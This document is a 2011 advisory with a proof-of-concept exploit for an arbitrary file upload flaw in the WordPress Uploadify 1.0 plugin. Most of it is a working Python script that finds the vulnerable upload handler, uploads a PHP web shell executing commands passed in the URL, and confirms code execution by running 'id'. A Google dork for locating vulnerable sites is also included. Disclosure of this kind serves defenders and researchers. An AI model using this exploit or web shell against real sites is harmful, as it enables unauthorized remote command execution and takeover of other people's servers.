WordPress Uploadify 1.0 Shell Upload

`GotGeek Labs  
http://www.gotgeek.com.br/  
  
WordPress Uploadify Plugin 1.0 Remote File Upload  
  
  
  
[+] Description  
  
Adds a shortcode to embed the necessary elements to use  
Uploadify in a page or post which will give your website  
visitors the ability to upload large files. By default the  
files will be uploaded to the folder set in your preferences.  
The shortcode supports most of the Uploadify options, so it  
can be easily customized to suit your needs.  
  
  
  
[+] Information  
  
Title: WordPress Uploadify Plugin 1.0 Remote File Upload  
Google Dork: inurl:"/wp-content/plugins/uploadify/"  
Advisory: gg-003-2011  
Date: 02-18-2011  
Last update: 02-21-2011  
Link: http://www.gotgeek.com.br/pocs/gg-003-2011.txt  
Tested on: CentOS 5.5 + WordPress 3.0.5  
  
  
  
[+] Vulnerability  
  
Uploadify Plugin is prone to a vulnerability that lets  
attackers upload arbitrary files. Successful exploitation  
of the vulnerability allows an attacker to upload a php code  
for example and run it in the context of the webserver  
process. This may facilitate unauthorized access or privilege  
escalation.  
  
Affected Versions:  
WordPress Uploadify Plugin 1.0  
  
  
  
[+] Proof of Concept/Exploit  
  
#!/usr/bin/python  
#  
  
import httplib  
import socket  
import sys, time  
  
  
plugin = "/wp-content/plugins/uploadify/includes/"  
shell = """  
<?php system($_GET['cmd']); ?>  
"""  
  
  
def banner():  
print "\n[*] gotgeek labs"  
print "[*] http://gotgeek.com.br\n"  
  
if len(sys.argv) < 4:  
banner()  
print "[?] Usage: " + sys.argv[0] + " <target> <dir> <port>"  
print "[?] Example: uploadify.py www.example.com /wordpress 80\n\n"  
sys.exit(1)  
  
target = sys.argv[1]  
dir = sys.argv[2]  
port = sys.argv[3]  
  
  
def checkurl():  
try:  
print "[*] Looking for vulnerable file..."  
conn = httplib.HTTPConnection(target+":"+port)  
conn.request("GET", dir + plugin + "process_upload.php")  
r1 = conn.getresponse()  
if r1.status == 200:  
print "[+] Found!\n"  
else:  
print "[-] NOT Found!\n\n"  
sys.exit(1)  
except socket.error, msg:  
print "[-] Can't connect!\n\n"  
sys.exit(1)  
  
  
def uploadshell():  
print "[*] Uploading shell..."  
params = ("\r\n"  
"------gg\r\n"  
'Content-Disposition: form-data; name="Filedata";  
filename="shell.php"\r\n'  
"Content-Type: application/octet-stream\r\n"  
"\r\n")  
params+= shell + "\r\n"  
params+= ("------gg--\r\n"  
"\r\n")  
headers = {'User-Agent': 'gotgeek',  
'Content-Type': 'multipart/form-data; boundary=----gg'}  
conn = httplib.HTTPConnection(target+":"+port)  
conn.request("POST", dir + plugin +  
"process_upload.php?folder=./", params, headers)  
time.sleep(3)  
  
  
def checkshell():  
print "[*] Checking shell.php..."  
conn = httplib.HTTPConnection(target+":"+port)  
conn.request("GET", dir + plugin + "shell.php")  
r2 = conn.getresponse()  
if r2.status == 200:  
print "[+] Shell Uploaded!\n"  
conn.request("GET", dir + plugin + "shell.php?cmd=id")  
r3 = conn.getresponse()  
id = r3.read()  
print "[+] id: " + id  
print "[+] shell: http://" + target + dir + plugin +  
"shell.php?cmd=[command]\n\n"  
conn.close()  
else:  
print "[-] NOT Uploaded!\n\n"  
sys.exit(1)  
  
  
  
def main():  
banner()  
checkurl()  
uploadshell()  
checkshell()  
  
if __name__ == "__main__":  
main()  
  
  
  
[+] References  
  
http://wordpress.org/extend/plugins/uploadify/  
http://wordpress.org/extend/plugins/uploadify/stats/  
  
  
  
[+] Credits  
  
b0telh0  
`